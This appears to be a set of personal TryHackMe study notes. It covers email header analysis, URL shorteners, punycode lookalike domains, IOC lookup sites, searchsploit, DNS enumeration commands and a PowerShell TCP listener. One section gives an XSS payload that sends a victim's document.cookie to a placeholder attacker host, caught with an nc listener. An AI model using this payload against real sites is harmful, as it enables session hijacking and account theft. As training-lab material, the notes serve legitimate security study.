[TryHackMe] Email Header Analysis

1. X-Originating-IP - The IP address of the email was sent from (this is known as an X-header)

2. Smtp.mailfrom/header.from - The domain the email was sent from (these headers are within Authentication-Results)

3. Reply-To - Instead of replying the From email address, this is the email address specific to receiving replying emails

Reference: https://web.archive.org/web/20221219232959/https://mediatemple.net/community/products/all/204643950/understanding-an-email-header

[TryHackMe] Fuzzy Hashing

 https://ssdeep-project.github.io/ssdeep/index.html

How to hide Caller ID

 Dial "*67" as a prefix.

[TryHackMe] URL Shortener

 [TryHackMe] URL Shortener

Common URL Shorteners are shown as follows.

bit.ly

goo.gl

ow.ly

s.id

smarturl.it

tiny.pl

tinyurl.com

x.co

Append "+" to the shortened URL to see the original URL.

[TryHackMe] Punycode

 Example:

What you saw in the URL above is adıdas.de which has the Punycode of http://xn--addas-o4a.de/

Tool:

Punycode can be inserted through Microsoft Word.

Punycode translator:

https://www.punycoder.com/

[TryHackMe] IOC Search

 https://metadefender.com/

https://talosintelligence.com/

https://www.virustotal.com/gui/home/upload

https://intelligence.any.run/analysis/lookup

https://bazaar.abuse.ch/browse/

https://malshare.com/search.php

PS: Obtain SHA256 under Windows

#CertUtil -hashfile [FILENAME] SHA256

[TryHackMe] Shellcode/Payload

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://github.com/danielmiessler/SecLists

[TryHackMe] SearchSploit

 Update Searchsploit

# searchsploit -u

Search exploits

# searchsploit KEYWORD

[TryHackMe] MD5 HASH Cracker

 https://crackstation.net/

[TryHackMe] Cookie Hijacking through XSS

 XSS Payload:

</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>

Listening side:

#nc -nvlp PORT_NUMBER

[Powershell] A script to listen a given TCP port

 # Manually execute "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process"

# Name this file as Listen-TCP.ps1

param (
    [int]$Port = 8080  # Default port is 8080, you can specify another port when running the script
)

$gsock = {
	# Create a TCP listener on the specified port
	$listener = [System.Net.Sockets.TcpListener]$Port
	$listener.Start()

	Write-Host "Listening on port $Port..."

	try {
		while ($true) {
			# Accept a client connection
			$client = $listener.AcceptTcpClient()
			Write-Host "Client connected!"

			# Get the network stream for reading data
			$stream = $client.GetStream()

			# Set up a reader to read from the stream
			$reader = New-Object System.IO.StreamReader($stream)

			# Read the data from the stream
			while ($reader.Peek()) {
				$data = $reader.ReadLine()
				Write-Host "Received: $data"
			}

			# Close the client connection
			$reader.Close()
			$client.Close()
		}
	}
	catch {
		Write-Host "Error: $_"
	}
	finally {
		# Stop the listener when done
		$listener.Stop()
		Write-Host "Listener stopped."
		.$gsock
	}
}

&$gsock
# .\Listen-TCP.ps1 -Port 9090

[certificate] ISO/IEC 27001:2022 LA

 

[TryHackMe] DNS Enumeration

 1) CA's Certificate Transparency logs

Use https://crt.sh/ to search the domain.

2) Google Hacking

Utilize the keywords, "site" and "inurl".

3) Employing the tool, dnsrecon

# dnsrecon -t brt -d DOMAIN

4) Employing another tool, sublist3r.py

# sublist3r.py -d DOMAIN

5) Leveraging Virtual Host through the tool, ffuf

# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u http://IP